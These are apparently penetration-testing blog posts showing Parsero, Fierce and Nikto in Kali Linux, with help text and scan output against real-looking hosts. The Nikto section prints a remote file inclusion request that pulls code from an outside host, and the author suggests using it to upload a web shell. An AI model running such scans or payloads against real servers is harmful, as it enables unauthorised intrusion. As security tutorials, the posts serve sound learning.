Parsero v0.75 has been included in the Kali Linux repository

Some days ago a friend told me, "Ey! Why you didn't write a post talking about how Parsero has been included in the Kali Linux repository?" "Seriously? I forgot it..." So here it is...

As you already know, Kali Linux is one of the most advanced and versatile penetration testing distribution ever made. Kali Linux originally started with earlier version of live Linux distribution named BackTrack. It is a GPL-compliant Linux distribution built by penetration testers for penetration tester. With millions of downloads, it has become the most widely adopted penetration testing framework in existence and is used by the security community all over the world.

That is the reason why I am really proud of announcing that my tool Parsero has been included in the Kali Linux repositories: http://tools.kali.org/information-gathering/parsero

Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries are the URL path of directories or files hosted on a web server which the administrators don't want to be indexed by crawlers. For example, "Disallow: /portal/login" don't allow to search engines like Google, Bing, Yahoo to index  www.example.com/portal/login  so nobody can locate it by searching on them.

Sometimes these paths typed in the Disallows entries are directly accessible by the users (without using a search engine) just visiting the URL and the Path. Sometimes they are not available to be visited by anybody... Because it is really common that the administrators write a lot of Disallows and some of them are available and some of them are not, you can use Parsero in order to check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.

Also, the fact that the administrator write a Robots.txt doesn't mean that the files or directories typed in this file will not be indexed by Bing, Google, Yahoo... For this reason, Parsero is capable of performing searches in Bing to locate content indexed without the web administrator authorization.

Now, you can run Parsero v0.75 directly from this awesome distribution. So, what do you need to use Parsero in Kali Linux?

Installing Parsero in Kali Linux

First of all, you need to execute:

root@kali:~# apt-get update

Then, you can search directly Parsero in the Kali Linux repositories by using the command bellow:

root@kali:~# apt-cache search parsero

Finally run the following command to install it.

root@kali:~# apt-get install parsero

Now you can have fun by checking the directories or files which could have sensitive information and should be "anonymous" to the search engines...

Currently, I'm working on developing the new release which will have another feature. It will be available here: https://github.com/behindthefirewalls/Parsero

Read More

DNS Enumeration with Fierce in Backtrack and Kali Linux

Fierce is a great script written in Perl by RSnake . This tool will help you for the first steps of a pentesting: the reconnaissance.

The idea is to gather as much interesting details as possible about your target before starting the attack.

Fierce is used for DNS Enumeration and has been included in Backtrack and Kali Linux distributions.

It is a great tool for discover non-contiguous IP address for a certain company. You can try a DNS transfer zone,  DNS brute force, reverse lookups...

These are the Fierce options.

root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -h
fierce.pl (C) Copywrite 2006,2007 - By RSnake at http://ha.ckers.org/fierce/

    Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Options:
    -connect    Attempt to make http connections to any non RFC1918
        (public) addresses.  This will output the return headers but
        be warned, this could take a long time against a company with
        many targets, depending on network/machine lag.  I wouldn't
        recommend doing this unless it's a small company or you have a
        lot of free time on your hands (could take hours-days). 
        Inside the file specified the text "Host:\n" will be replaced
        by the host specified. Usage:

    perl fierce.pl -dns example.com -connect headers.txt

    -delay        The number of seconds to wait between lookups.
    -dns        The domain you would like scanned.
    -dnsfile      Use DNS servers provided by a file (one per line) for
                reverse lookups (brute force).
    -dnsserver    Use a particular DNS server for reverse lookups
        (probably should be the DNS server of the target).  Fierce
        uses your DNS server for the initial SOA query and then uses
        the target's DNS server for all additional queries by default.
    -file        A file you would like to output to be logged to.
    -fulloutput    When combined with -connect this will output everything
        the webserver sends back, not just the HTTP headers.
    -help        This screen.
    -nopattern    Don't use a search pattern when looking for nearby
        hosts.  Instead dump everything.  This is really noisy but
        is useful for finding other domains that spammers might be
        using.  It will also give you lots of false positives,
        especially on large domains.
    -range        Scan an internal IP range (must be combined with
        -dnsserver).  Note, that this does not support a pattern
        and will simply output anything it finds.  Usage:

    perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

    -search        Search list.  When fierce attempts to traverse up and
        down ipspace it may encounter other servers within other
        domains that may belong to the same company.  If you supply a
        comma delimited list to fierce it will report anything found.
        This is especially useful if the corporate servers are named
        different from the public facing website.  Usage:

    perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

        Note that using search could also greatly expand the number of
        hosts found, as it will continue to traverse once it locates
        servers that you specified in your search list.  The more the
        better.
    -suppress    Suppress all TTY output (when combined with -file).
    -tcptimeout    Specify a different timeout (default 10 seconds).  You
        may want to increase this if the DNS server you are querying
        is slow or has a lot of network lag.
    -threads  Specify how many threads to use while scanning (default
      is single threaded).
    -traverse    Specify a number of IPs above and below whatever IP you
        have found to look for nearby IPs.  Default is 5 above and
        below.  Traverse will not move into other C blocks.
    -version    Output the version number.
    -wide        Scan the entire class C after finding any matching
        hostnames in that class C.  This generates a lot more traffic
        but can uncover a lot more information.
    -wordlist    Use a seperate wordlist (one word per line).  Usage:

    perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt 

We can make a reverse lookup for a entire class C network like 65.55.58.0/24

root@bt:/pentest/enumeration/
dns/fierce# ./fierce.pl -range 65.55.58.0-255
65.55.58.2    ten1-2-194.co1-6nf-1a.ntwk.msn.net
65.55.58.3    ten1-2-194.co1-6nf-1b.ntwk.msn.net
65.55.58.38    discussions.connect.microsoft.com
65.55.58.183    submit.microsoft.com
65.55.58.186    cvp.membership.microsoft.com
65.55.58.192    microsoftevents.org
65.55.58.197    eugrantsadvisor.com
65.55.58.201    00001001.ch
65.55.58.202    bizspark.microsoft.com
65.55.58.204    cvp.services.microsoft.com
65.55.58.205    piinternalfe2.microsoft.com
65.55.58.206    cvp.services.ppe.microsoft.com
65.55.58.210    livests.test.itasignon.com
65.55.58.211    sts.test.itasignon.com
65.55.58.212    beta.itasignon.microsoft.com
65.55.58.213    itasignon.microsoft.com
65.55.58.214    websitespark.microsoft.com
65.55.58.241    co1vlsc04.microsoft.com
65.55.58.242    co1vlsc05.microsoft.com
65.55.58.243    co1vlsc06.microsoft.com
65.55.58.247    lva.beta.msllab.microsoft.com
65.55.58.248    pi.beta.msllab.microsoft.com

We can try to make a DNS transfer zone and a DNS brute force against google.es. You can choose the DNS that you desire to make the DNS requests. If it isn't specified, Fierce will request to the DNS servers of the target company. In this case, we make the requests against OpenDNS servers 208.67.222.222.

root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -dns google.es -dnsserver 208.67.222.222
DNS Servers for google.es:
    ns3.google.com
    ns2.google.com
    ns4.google.com
    ns1.google.com

Trying zone transfer first...
    Testing ns3.google.com
        Request timed out or transfer not allowed.
    Testing ns2.google.com
        Request timed out or transfer not allowed.
    Testing ns4.google.com
        Request timed out or transfer not allowed.
    Testing ns1.google.com
        Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
173.194.41.241    academico.google.es
173.194.41.243    academico.google.es
173.194.41.240    academico.google.es
173.194.41.244    academico.google.es
173.194.41.242    academico.google.es
173.194.67.94    accounts.google.es
...
...
...

You can edit the brute force list as you want.

root@bt:/pentest/enumeration/dns/fierce# more hosts.txt
0
01
02
03
1
10
11
12
13
14
15
16
17
18
19
2
20
3
3com
4
5
6
7
8
9
ILMI
a
a.auth-ns
a01
a02
a1
a2
abc
about
ac
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
...
...
...

Read More

Pentesting Web Servers with Nikto in Backtrack and Kali Linux

Nikto is one of the most popular web security application when you are beginning a web pentesting project.

You can download Nikto from http://cirt.net/nikto2 This tool has been included in Backtrack and Kali Linux distributions.

Nikto is an Open Source web server scanner. This tool performs test against web servers making requests for multiple items. Nikto checks:

• Over 6500 dangerous files/CGIs.
• More than 1250 outdated version for several web servers.
• Specific problems on over 270 servers.
• Presence of index files.
• HTTP server options like TRACE.
• Installed software and web servers.

Nikto creates a lot of requests quickly, is not designed as an overly stealthy tool. If you run Nikto against a remote Web Server, the administrator could read a lot of lines on web server log which show the attack. Some SIEMs have defaults rules for correlating these logs and it could create an alarm warning to the administrators about the attack.

These are the Nikto options.

jnieto@naltor:~$ nikto 
Option host requires an argument

       -config+            Use this config file
       -Cgidirs+           scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
       -dbcheck            check database and other key files for syntax errors
       -Display+           Turn on/off display outputs
       -evasion+           ids evasion technique
       -Format+            save file (-o) format
       -host+              target host
       -Help               Extended help information
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -mutate+            Guess additional file names
       -mutate-options+    Provide extra information for mutations
       -output+            Write output to this file
       -nocache            Disables the URI cache
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -port+              Port to use (default 80)
       -Plugins+           List of plugins to run (default: ALL)
       -root+              Prepend root value to all requests, format is /directory 
       -ssl                Force ssl mode on port
       -Single             Single request mode
       -timeout+           Timeout (default 2 seconds)
       -Tuning+            Scan tuning
       -update             Update databases and plugins from CIRT.net
       -vhost+             Virtual host (for Host header)
       -Version            Print plugin and database versions
     + requires a value

 Note: This is the short help output. Use -H for full help.

We are going to run Nikto against a server.

jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          XXX.XXX.XXX.XXX
+ Target Hostname:    www.XxXxXxXxXx.es
+ Target Port:        80
+ Start Time:         2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html, 
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time:           2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------

As you can see, we have find out the Server and PHP versions and a lot of interesting folders.

We have discover a RFI (Remote File Include) on this server...

+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

This URL path get a PHP code from http://cirt.net/rfiinc.txt? with the next code:

<?php phpinfo(); ?>

This code executes "phpinfo" but if you want, you can upload a web shell in order to gain access to the server.

Next line is interesting too. Nikto has located some URLs where you  could upload files with your own source code.

+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.

Nikto is one of the first applications that I run when a client request me a web audit.

Read More